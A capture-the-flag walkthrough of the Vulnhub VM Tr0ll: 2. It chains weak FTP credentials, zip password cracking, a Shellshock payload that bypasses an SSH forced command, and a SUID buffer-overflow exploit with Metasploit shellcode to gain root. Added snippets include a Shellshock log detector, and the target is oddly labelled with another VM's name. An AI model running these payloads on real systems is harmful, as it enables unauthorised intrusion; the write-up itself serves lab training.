[Vulnhub]Tr0ll: 2

“The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :) Difficulty is beginner++ to intermediate.” – Maleus

More information and the OVA file download can be found on the Vulnhub page.

Attacker & Target

Attacker: Kali Linux (10.10.10.131/24)

Target: TopHatSec: Freshly (10.10.10.141/24)

Vulnerability & Exploit

  • Found hidden information in a picture
  • Weak password used for the FTP login; logged in and downloaded a suspicious encrypted zip file
  • Cracked the zip file with the downloaded dictionary file and found user ‘noob’ and his SSH private key file
  • The Shellshock bug gives an attacker a way to break in
  • Buffer overflow analysis and exploit to get ROOT

Method

  • Scanned the network to discover the target server [netdiscover]
  • Port scanned the target to discover open ports and running services [nmap]
  • Scanned the web application for any web vulnerability [nikto]
  • Analysed robots.txt and wrote a script to check the folders listed in it
  • Gathered web information by interacting with the web server [firefox]
  • Downloaded the picture from four different folders and revealed the hidden information stored in one of them
  • Found the hidden folder and downloaded a base64-encoded file from it; once decoded, it turned out to be a dictionary file
  • Tried weak passwords for the FTP login and found one that works (Tr0ll / Tr0ll)
  • Downloaded the encrypted zip file through FTP and cracked it with the dictionary file found earlier [fcrackzip]
  • Exploited the Shellshock bug together with noob’s private key file to break into the target machine
  • Looked around and found a suspicious program with the SUID bit set under ‘/nothing_to_see_here/choose_wisely/’
  • Analysed the target program and worked out a PoC to exploit its BoF vulnerability to get ROOT

Tools

All the tools used here can be found in Kali Linux.

Walkthrough

Using netdiscover as a routine step to detect the target’s IP address (10.10.10.141 in this case).

10.10.10.141 is our target!

Then I ran an nmap scan to detect open ports and running services on the target. From the result, TCP ports 21, 22 and 80 were discovered, running on Ubuntu Linux.

nmap -sV -v -O -A -T5 -p- 10.10.10.141

Next, I ran a nikto scan on port 80 to check for any web vulnerability.

Nothing too exciting, but I noticed that robots.txt was found without any disallow entries, which is odd. As a result, I opened the Iceweasel browser to have a closer look at robots.txt.

Here I wrote a Python script to check all of the directories listed in robots.txt, filter out the working ones and save them to a file.

robot_check.py
#!/usr/bin/python

import httplib

ip = '10.10.10.141'
img_name = 'cat_the_troll.jpg'

# read URIs found in robots.txt (one path per line, e.g. /noob)
f = open('robots.txt', 'r')
uri_list = f.readlines()
f.close()

uri_to_check = []

print '[*] Start checking ...'
for uri in uri_list:
    uri = uri.rstrip('\n')
    if not uri:
        continue                      # skip blank lines
    conn = httplib.HTTPConnection(ip)
    conn.request('GET', uri + '/')
    response = conn.getresponse()
    conn.close()

    # filter out 404s to keep the result tidy; any other status is worth a look
    if response.status != 404:
        print '[+] ' + uri + '/'
        print '[-] ' + str(response.status)
        # candidate directory: remember the picture URL for further analysis
        uri_to_check.append('http://' + ip + uri + '/' + img_name)

# save the URIs under inspection to a file for further analysis
print '[*] Saving result to file: uris_to_check.txt'
f = open('uris_to_check.txt', 'w')
for uri in uri_to_check:
    f.write(uri + '\n')
f.close()

print '[*] Done!'

Four directories returned a 200 response code. Then I used wget with the -i switch to download the picture from each directory.

root@kali:~/tr0ll2# wget -i uris_to_check.txt 
--2015-06-23 06:19:05--  http://10.10.10.141/noob/cat_the_troll.jpg
Connecting to 10.10.10.141:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15831 (15K) [image/jpeg]
Saving to: `cat_the_troll.jpg'

100%[====================================================================================================================>] 15,831      --.-K/s   in 0s      

2015-06-23 06:19:05 (169 MB/s) - `cat_the_troll.jpg' saved [15831/15831]

--2015-06-23 06:19:05--  http://10.10.10.141/keep_trying/cat_the_troll.jpg
Reusing existing connection to 10.10.10.141:80.
HTTP request sent, awaiting response... 200 OK
Length: 15831 (15K) [image/jpeg]
Saving to: `cat_the_troll.jpg.1'

100%[====================================================================================================================>] 15,831      --.-K/s   in 0s      

2015-06-23 06:19:05 (89.2 MB/s) - `cat_the_troll.jpg.1' saved [15831/15831]

--2015-06-23 06:19:05--  http://10.10.10.141/dont_bother/cat_the_troll.jpg
Reusing existing connection to 10.10.10.141:80.
HTTP request sent, awaiting response... 200 OK
Length: 15873 (16K) [image/jpeg]
Saving to: `cat_the_troll.jpg.2'

100%[====================================================================================================================>] 15,873      --.-K/s   in 0s      

2015-06-23 06:19:05 (175 MB/s) - `cat_the_troll.jpg.2' saved [15873/15873]

--2015-06-23 06:19:05--  http://10.10.10.141/ok_this_is_it/cat_the_troll.jpg
Reusing existing connection to 10.10.10.141:80.
HTTP request sent, awaiting response... 200 OK
Length: 15831 (15K) [image/jpeg]
Saving to: `cat_the_troll.jpg.3'

100%[====================================================================================================================>] 15,831      --.-K/s   in 0s      

2015-06-23 06:19:05 (36.5 MB/s) - `cat_the_troll.jpg.3' saved [15831/15831]

FINISHED --2015-06-23 06:19:05--
Total wall clock time: 0.02s
Downloaded: 4 files, 62K in 0.001s (79.6 MB/s)
root@kali:~/tr0ll2# ls -alh
total 84K
drwxr-xr-x  2 root root 4.0K Jun 23 06:19 .
drwxr-xr-x 39 root root 4.0K Jun 23 04:58 ..
-rw-r--r--  1 root root  16K Oct  4  2014 cat_the_troll.jpg
-rw-r--r--  1 root root  16K Oct  4  2014 cat_the_troll.jpg.1
-rw-r--r--  1 root root  16K Oct  4  2014 cat_the_troll.jpg.2
-rw-r--r--  1 root root  16K Oct  4  2014 cat_the_troll.jpg.3
-rwxr-xr-x  1 root root  927 Jun 23 06:18 robot_check.py
-rw-r--r--  1 root root  323 Jun 23 05:10 robots.txt
-rw-r--r--  1 root root  195 Jun 23 06:18 uris_to_check.txt

Next I used strings on each downloaded picture to look for hidden information.

root@kali:~/tr0ll2# strings cat_the_troll.jpg.2
JFIF
#3-652-108?QE8<M=01F`GMTV[\[7DcjcXjQY[W
)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
"aq2
... ... truncated ... ...
]=%em;
lj\p
*/ p?E$
Look Deep within y0ur_self for the answer

y0ur_self looks like another hidden directory on the server.

There I found an answer.txt file whose content looks base64-encoded. I decoded it and saved the result to answer2.txt.

root@kali:~/tr0ll2# cat answer.txt | base64 --decode > answer2.txt

This file looks more like a dictionary (word list) file and will be useful later.

FTP & ZIP Crack

Now let’s move on to the FTP service.

root@kali:~# ftp 10.10.10.141
Connected to 10.10.10.141.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.141:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> bye
221 Goodbye.

I first tried to log in as the anonymous user but failed. After reading the MOTD message I used Tr0ll / Tr0ll as the login credentials and logged in successfully.

root@kali:~# ftp 10.10.10.141
Connected to 10.10.10.141.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (10.10.10.141:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            1474 Oct 04  2014 lmao.zip
226 Directory send OK.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
1474 bytes received in 0.00 secs (5272.7 kB/s)
ftp> bye
221 Goodbye.

Here I found a zip file. After downloading it and trying to unzip lmao.zip, it asked for a password…

Next I tried to crack the zip password with the dictionary file found earlier.

root@kali:~/tr0ll2# fcrackzip -v -D -u -p ~/tr0ll2/answer2.txt lmao.zip 
found file 'noob', (size cp/uc   1300/  1679, flags 9, chk 1005)


PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL

fcrackzip finds the password in seconds! Now I can get into the lmao directory, where I found noob’s SSH key file.

SSH & Shellshock

First, I tried to log in via SSH with noob’s key file directly, but it failed. It looks like a forced command is run on login.

root@kali:~/tr0ll2/lmao# ssh -i noob noob@10.10.10.141
The authenticity of host '10.10.10.141 (10.10.10.141)' can't be established.
ECDSA key fingerprint is 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.141' (ECDSA) to the list of known hosts.
TRY HARDER LOL!
Connection to 10.10.10.141 closed.

By searching Google, I found that the Shellshock bug helps to bypass this and get commands executed. For more details about exploiting SSH forced commands via the Shellshock vulnerability, refer to the linked write-ups.

So I tried the following command and it works!

root@kali:~/tr0ll2/lmao# ssh -i noob noob@10.10.10.141 '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
python -c "import pty; pty.spawn('/bin/bash')"
noob@Tr0ll2:~$ id
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
noob@Tr0ll2:~$ pwd
pwd
/home/noob
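From the defender’s side, the bypass above works because sshd hands the client’s requested command to the forced command through the SSH_ORIGINAL_COMMAND environment variable, and a vulnerable bash parses any value beginning with “() {” as a function definition and runs what follows. The script below is an added example, not code from the original post; it runs over constructed sshd and httpd log lines (the log format and field names are assumptions) and flags values carrying a Shellshock-style function definition:

```python
#!/usr/bin/env python3
"""Detect Shellshock-style payloads in fields that end up in bash's environment."""
import re

# A vulnerable bash treats any environment value beginning with "() {" as a
# function definition and executes whatever follows the closing brace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<tail>.+)')

# Fields whose values the daemon copies into environment variables (assumed
# log format: sshd logs SSH_ORIGINAL_COMMAND, httpd logs the User-Agent as UA).
FIELD_RE = re.compile(r'(?P<field>SSH_ORIGINAL_COMMAND|UA)="(?P<value>[^"]*)"')

# Constructed sample records mirroring the forced-command bypass on this box.
SAMPLE_LOG = [
    'sshd[811]: noob from 10.10.10.131 SSH_ORIGINAL_COMMAND="() { :;}; /bin/bash"',
    'sshd[812]: noob from 10.10.10.131 SSH_ORIGINAL_COMMAND="ls -la"',
    'httpd: 10.10.10.131 GET /cgi-bin/status UA="() { :;}; echo vulnerable"',
    'httpd: 10.10.10.131 GET /index.html UA="Mozilla/5.0"',
]


def find_shellshock(lines):
    """Return (line_no, field, trailing command) for every suspicious record."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in FIELD_RE.finditer(line):
            s = SHELLSHOCK_RE.match(m.group('value').lstrip())
            if s:
                hits.append((n, m.group('field'), s.group('tail').strip()))
    return hits


if __name__ == '__main__':
    for n, field, tail in find_shellshock(SAMPLE_LOG):
        print('line %d: %s carries a function definition, trailing command: %r'
              % (n, field, tail))
```

On the sample data only the two records with a “() {” prefix are reported, together with the command that bash would have executed.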

Now I have a shell on the target.

By poking around the file system, I found three ‘door’ folders under /nothing_to_see_here/choose_wisely/. There is an r00t file in each door folder, and they change every couple of minutes.

noob@Tr0ll2:/nothing_to_see_here/choose_wisely$ ls -al *
ls -al *
door1:
total 16
drwsr-xr-x 2 root root 4096 Oct  4  2014 .
drwsr-xr-x 5 root root 4096 Oct  4  2014 ..
-rwsr-xr-x 1 root root 7271 Oct  4  2014 r00t

door2:
total 20
drwsr-xr-x 2 root root 4096 Oct  5  2014 .
drwsr-xr-x 5 root root 4096 Oct  4  2014 ..
-rwsr-xr-x 1 root root 8401 Oct  5  2014 r00t

door3:
total 16
drwsr-xr-x 2 root root 4096 Oct  5  2014 .
drwsr-xr-x 5 root root 4096 Oct  4  2014 ..
-rwsr-xr-x 1 root root 7273 Oct  5  2014 r00t

After some trial and error, I found that the r00t file with the biggest size is the one vulnerable to a buffer overflow.

noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./r00t $(python -c 'print "A" * 500')
Segmentation fault

Aha, a segmentation fault looks good so far. Then I uploaded the checksec.sh script to check the binary’s protections.

noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./checksec.sh --file r00t 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   r00t

Great, nearly no protection. Now it’s time to move on to find the offset and overwrite EIP.

First, I used pattern_create.rb to generate a 500-byte unique string:

root@kali:~/tr0ll2# /usr/share/metasploit-framework/tools/pattern_create.rb 500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

Then I used gdb on the target machine to track the value of EIP when the overflow happened.

noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ gdb -q ./r00t
gdb -q ./r00t
Reading symbols from /nothing_to_see_here/choose_wisely/door1/r00t...done.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
Starting program: /nothing_to_see_here/choose_wisely/door1/r00t Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()
(gdb) i r esp
i r esp
esp            0xbffffab0 0xbffffab0
(gdb)

0x6a413969 is part of the pattern, and pattern_offset.rb gives the offset as 268. I also noted that the value in ESP is 0xbffffab0.

root@kali:~/tr0ll2# /usr/share/metasploit-framework/tools/pattern_offset.rb 0x6a413969
[*] Exact match at offset 268
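For reference, pattern_create.rb and pattern_offset.rb can be reproduced in a few lines of Python. This is an added example, not code from the original post or from Metasploit; it builds the same Aa0Aa1… pattern and recovers the offset 268 from the EIP value 0x6a413969 seen in gdb by unpacking the register little-endian into its four ASCII bytes:

```python
#!/usr/bin/env python3
"""Pure-Python equivalents of pattern_create.rb and pattern_offset.rb."""
import itertools
import string
import struct


def pattern_create(length):
    """Return `length` chars of the non-repeating Upper-lower-digit pattern."""
    triplets = (u + l + d for u in string.ascii_uppercase
                for l in string.ascii_lowercase
                for d in string.digits)
    # one extra triplet covers lengths that are not a multiple of 3
    return ''.join(itertools.islice(triplets, length // 3 + 1))[:length]


def pattern_offset(value, length=500):
    """Offset of a crash value inside the pattern, or -1 if it is not there.

    `value` is either the 32-bit register content (e.g. 0x6a413969), which is
    unpacked little-endian into its 4 ASCII bytes ("i9Aj"), or that string.
    """
    if isinstance(value, int):
        needle = struct.pack('<I', value).decode('ascii')
    else:
        needle = value
    return pattern_create(length).find(needle)


if __name__ == '__main__':
    # 0x6a413969 is the EIP value gdb reported for r00t; the offset is 268.
    print(pattern_create(500))
    print('[*] Exact match at offset %d' % pattern_offset(0x6a413969))
```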

Then I used Metasploit to generate shellcode that runs /bin/sh.

msf payload(exec) > generate -b '\x00\x0a\x0d'
# linux/x86/exec - 70 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependSetresgid=false, PrependSetregid=false, 
# PrependSetgid=false, PrependChrootBreak=false, 
# AppendExit=false, CMD=/bin/sh
buf = 
"\xba\xa0\x7b\x18\x95\xdb\xcd\xd9\x74\x24\xf4\x58\x33\xc9" +
"\xb1\x0b\x31\x50\x15\x83\xe8\xfc\x03\x50\x11\xe2\x55\x11" +
"\x13\xcd\x0c\xb4\x45\x85\x03\x5a\x03\xb2\x33\xb3\x60\x55" +
"\xc3\xa3\xa9\xc7\xaa\x5d\x3f\xe4\x7e\x4a\x37\xeb\x7e\x8a" +
"\x67\x89\x17\xe4\x58\x3e\x8f\xf8\xf1\x93\xc6\x18\x30\x93"
msf payload(exec) >

Next, I constructed the payload and exploited the r00t file to get ROOT on the target!

noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t $(python -c "print 'A' * 268 + '\x80\xfb\xff\xbf' + '\x90' * 16 + '\xba\xa0\x7b\x18\x95\xdb\xcd\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0b\x31\x50\x15\x83\xe8\xfc\x03\x50\x11\xe2\x55\x11\x13\xcd\x0c\xb4\x45\x85\x03\x5a\x03\xb2\x33\xb3\x60\x55\xc3\xa3\xa9\xc7\xaa\x5d\x3f\xe4\x7e\x4a\x37\xeb\x7e\x8a\x67\x89\x17\xe4\x58\x3e\x8f\xf8\xf1\x93\xc6\x18\x30\x93'")
# id
id
uid=1002(noob) gid=1002(noob) euid=0(root) groups=0(root),1002(noob)

And then grab the flag!

# cd /root
cd /root
# ls -al
ls -al
total 80
drwx------ 11 root   root   4096 Oct 14  2014 .
drwxr-xr-x 23 root   root   4096 Oct  5  2014 ..
-rw-------  1 root   root     67 Oct 14  2014 .bash_history
-rw-r--r--  1 root   root   3106 Apr 19  2012 .bashrc
-rw-r--r--  1 root   root    140 Apr 19  2012 .profile
-rw-r--r--  1 root   root     66 Oct  5  2014 .selected_editor
drwx------  2 root   root   4096 Oct  4  2014 .ssh
drwxr-xr-x  2 root   root   4096 Oct  5  2014 .vim
-rw-------  1 root   root   4259 Oct 14  2014 .viminfo
-rw-r--r--  1 root   root     68 Oct  6  2014 Proof.txt
drwxr-xr-x  5 root   root   4096 Oct  4  2014 core1
drwxr-xr-x  5 root   root   4096 Oct  4  2014 core2
drwxr-xr-x  5 root   root   4096 Oct  4  2014 core3
drwxr-xr-x  5 root   root   4096 Oct  4  2014 core4
drwxr-xr-x  2 root   root   4096 Oct  5  2014 goal
drwxr-xr-x  2 root   root   4096 Oct  6  2014 hardmode
-rw-r--r--  1 maleus maleus 1474 Oct  4  2014 lmao.zip
-rw-r--r--  1 root   root    828 Oct  4  2014 ran_dir.py
drwxr-xr-x  2 root   root   4096 Oct  6  2014 reboot
# cat Proof.txt
cat Proof.txt
You win this time young Jedi...

a70354f0258dcc00292c72aab3c8b1e4  
#
2015-06-24 04:31:06 -0400